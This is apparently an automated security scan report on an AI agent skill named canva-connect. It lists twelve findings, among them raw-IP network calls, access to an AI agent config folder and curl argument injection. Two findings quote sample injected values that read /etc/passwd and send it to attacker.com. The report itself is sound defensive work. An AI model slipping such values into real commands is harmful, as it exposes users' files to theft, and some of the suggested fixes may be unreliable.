Trust Assessment
canva received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 12 findings: 5 critical, 6 high, 1 medium, and 0 low severity. Key findings include Network egress to untrusted endpoints, Hidden network beacons / undisclosed telemetry, Sensitive path access: AI agent config.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings12
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/coolmanns/canva-connect/SKILL.md:69 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/coolmanns/canva-connect/scripts/canva.sh:166 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/coolmanns/canva-connect/scripts/canva.sh:242 | |
| CRITICAL | Arbitrary file write/command execution via export output path The `cmd_export` function uses a user-provided `--output` argument directly as the output filename for `curl -o`. An attacker can inject `curl` options (e.g., `--output /dev/null -K /etc/passwd`) or shell metacharacters, leading to arbitrary file writes, overwrites, or command execution. Sanitize the `$output` variable to prevent `curl` option injection and shell metacharacter execution. Ensure it only contains a valid filename. Consider using `printf %s "$output" | xargs -0 curl -s -o` or strict regex validation for filenames. | LLM | scripts/canva.sh:253 | |
| CRITICAL | Arbitrary file read/upload via asset upload path The `cmd_assets_upload` function takes a user-controlled file path (`$file`) which is then passed to `api_upload`. The `api_upload` function uses `curl ... --data-binary "@$file"`. An attacker can provide a path to a sensitive file (e.g., `/etc/passwd`) to upload its content to Canva, or inject `curl` options (e.g., `--output /dev/null -F 'file=@/etc/passwd' http://attacker.com/upload`) to exfiltrate data to an arbitrary server or execute other `curl` commands. Sanitize the `$file` variable to prevent `curl` option injection and ensure it points to a legitimate, intended file. Use `printf %s "$file" | xargs -0 curl ... --data-binary @` or strict validation of the file path. | LLM | scripts/canva.sh:105 | |
| HIGH | Hidden network beacons / undisclosed telemetry Command output piped through base64 encoding Remove undisclosed network calls and telemetry. All outbound communication should be documented and necessary for the skill's stated purpose. BCC injection in email tools is almost always malicious. | Manifest | skills/coolmanns/canva-connect/scripts/canva.sh:385 | |
| HIGH | Sensitive path access: AI agent config Access to AI agent config path detected: '~/.clawdbot/'. This may indicate credential theft. Verify that access to this sensitive path is justified and declared. | Static | skills/coolmanns/canva-connect/SKILL.md:74 | |
| HIGH | Sensitive path access: AI agent config Access to AI agent config path detected: '~/.clawdbot/'. This may indicate credential theft. Verify that access to this sensitive path is justified and declared. | Static | skills/coolmanns/canva-connect/SKILL.md:101 | |
| HIGH | Sensitive path access: AI agent config Access to AI agent config path detected: '~/.clawdbot/'. This may indicate credential theft. Verify that access to this sensitive path is justified and declared. | Static | skills/coolmanns/canva-connect/SKILL.md:215 | |
| HIGH | Sensitive path access: AI agent config Access to AI agent config path detected: '~/.clawdbot/'. This may indicate credential theft. Verify that access to this sensitive path is justified and declared. | Static | skills/coolmanns/canva-connect/SKILL.md:216 | |
| HIGH | Potential curl argument injection via API endpoint/method The `api_request` function directly interpolates `$method` and `$endpoint` into `curl` arguments. If a user-controlled input (e.g., a design ID) is used to construct these values without proper sanitization, an attacker could inject arbitrary `curl` options, potentially leading to data exfiltration or other malicious actions. Ensure all user-controlled inputs used to construct `$method` and `$endpoint` are strictly validated and sanitized to prevent `curl` option injection. For example, validate IDs against a regex for expected formats. | LLM | scripts/canva.sh:87 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/coolmanns/canva-connect/scripts/canva.sh:9 |
Scan History
Embed Code
[](https://skillshield.io/report/2778a7503f3ed4d9)
Powered by SkillShield